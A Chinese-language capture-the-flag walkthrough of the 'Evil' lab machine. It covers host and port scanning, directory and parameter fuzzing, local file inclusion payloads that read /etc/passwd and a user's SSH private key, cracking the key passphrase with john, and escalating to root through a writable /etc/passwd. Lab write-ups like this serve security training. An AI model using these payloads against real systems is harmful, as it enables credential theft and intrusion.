Evil靶场

果粒程11222023-11-17 15:50

Evil

1.主机发现

  • 使用命令探测存活主机,80.139是kali的地址,所以靶机地址就是80.134

    fping -gaq 192.168.80.0/24

2.端口扫描

  • 开放80,22端口

    nmap -Pn -sV -p- -A 192.168.80.134

3.信息收集

  • 访问web界面

  • 路径扫描

    复制代码 
    gobuster dir -u http://192.168.80.134 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

  • 访问robots.txt

  • 访问/secret ,发现是空页面

  • 继续对/secret进行路径扫描

    复制代码 
    gobuster dir -u http://192.168.80.134/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

  • 访问/evil.php,依然返回空页面

  • 尝试对/evil.php的参数进行爆破,并没有探测出参数信息

    复制代码 
    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:KEY -w value.txt:VAL -u http://192.168.80.134/secret/evil.php?KEY=VAL -fs 0

  • 尝试/evil.php是否存在文件包含,目前已知根目录下的robots.txt文件是真实存在的,所以尝试对其再次进行文件包含探测;发现一个command参数

    复制代码 
    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:DIR -u http://192.168.80.134/secret/evil.php?DIR=../robots.txt -fs 0

  • 验证command参数是否真正存在文件包含

4.利用文件包含漏洞

  • 读取/etc/passwd文件

  • 使用PHP协议封装读取evil.php源文件

    复制代码 
    /secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php

  • 对获得的字符串进行base64解码

    php 复制代码 
    <?php
    $filename = $_GET['command'];
    include($filename);
?>

  • 尝试写入文件,内容为123的base64编码后的字符串

    复制代码 
    /secret/evil.php?command=php://filter/write=convert.base64-decode/resource=glc.php&txt=MTIz

  • 尝试访问刚才写入的文件,发现没有给文件,证明写入失败

5.尝试ssh登录

  • 刚才我们发现没有文件写入权限,那我们就换个思路,还记得我们当时读取的/etc/passwd文件吗,自己研究一下发现了一个mowree用户,尝试对其进行ssh登录

  • 我们发现mowree用户允许公钥和密码登录两种方式

    复制代码 
    ssh [email protected] -v

  • 那我们可以利用文件包含漏洞去读取mowree用户的公私钥文件

    • 公钥文件,发现是rsa加密的

      复制代码 
      /secret/evil.php?command=../../../../../../home/mowree/.ssh/authorized_keys

    • 私钥文件

      复制代码 
      /secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa

  • 查看网站源码,将私钥文件的内容复制到本地,并给文件赋予权限,尝试ssh登录,发现需要passphrase(ssh-key 的密语字符串)

  • 对passphrase进行爆破

    • 将id_rsa文件转换为john命令能够识别的文件

      复制代码 
      ./ssh2john.py ~/id_rsa > ~/glc

    • 使用john进行爆破,爆破成功,密码为unicorn

      复制代码 
      john glc --wordlist=/usr/share/wordlists/rockyou.txt

6.获得shell

  • ssh登录mowree用户

  • 拿到第一个flag

7.提权

  • 查看内核版本和发行版本

  • 内核版本4.19.0-17;发行版本 Debian10

  • 使用msf提权发现都提权失败了,有兴趣的可以自己试一下

  • 换个思路,查看存在写权限的文件

    复制代码 
    find / -writable 2>/dev/null | grep -v proc

  • 发现对/etc/passwd文件具有写权限,那么问题就变得简单了,直接修改文件中root账号的密码就可以啦

  • 生成一个加密密码,密码为root

    复制代码 
    openssl passwd -1

  • 尝试用修改的密码登录root账号,成功提权,获得第二个flag

相关推荐
2501_915918413 小时前
多账号管理与自动化中的浏览器指纹对抗方案
websocket·网络协议·tcp/ip·http·网络安全·https·udp
神经毒素3 小时前
WEB安全--RCE--webshell bypass2
安全·web安全
Johnstons4 小时前
AnaTraf:深度解析网络性能分析(NPM)
前端·网络·安全·web安全·npm·网络流量监控·网络流量分析
网络空间小黑4 小时前
常见WEB漏洞----暴力破解
计算机网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
Johny_Zhao5 小时前
K8S+nginx+MYSQL+TOMCAT高可用架构企业自建网站
linux·网络·mysql·nginx·网络安全·信息安全·tomcat·云计算·shell·yum源·系统运维·itsm
Suckerbin7 小时前
基于HTTP头部字段的SQL注入:SQLi-labs第17-20关
网络·笔记·网络协议·安全·http·网络安全
csKQL10 小时前
第一章 应急响应-webshell查杀
网络安全·应急响应·玄机
第十六年盛夏.11 小时前
【网络安全】SQL注入
sql·web安全·网络安全
玥轩_52112 小时前
BUUCTF 大流量分析(三) 1
安全·网络安全·wireshark·ctf·misc·buuctf·大流量分析
芯盾时代17 小时前
数据出境的安全合规思考
大数据·人工智能·安全·网络安全·信息与通信
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04组基轨迹建模 GBTM的介绍与实现(Stata 或 R)05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06Coze扣子平台完整体验和实践(附国内和国际版对比)07YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09DeepSeek各版本说明与优缺点分析10【操作系统】Linux之网络编程(TCP)(头歌作业)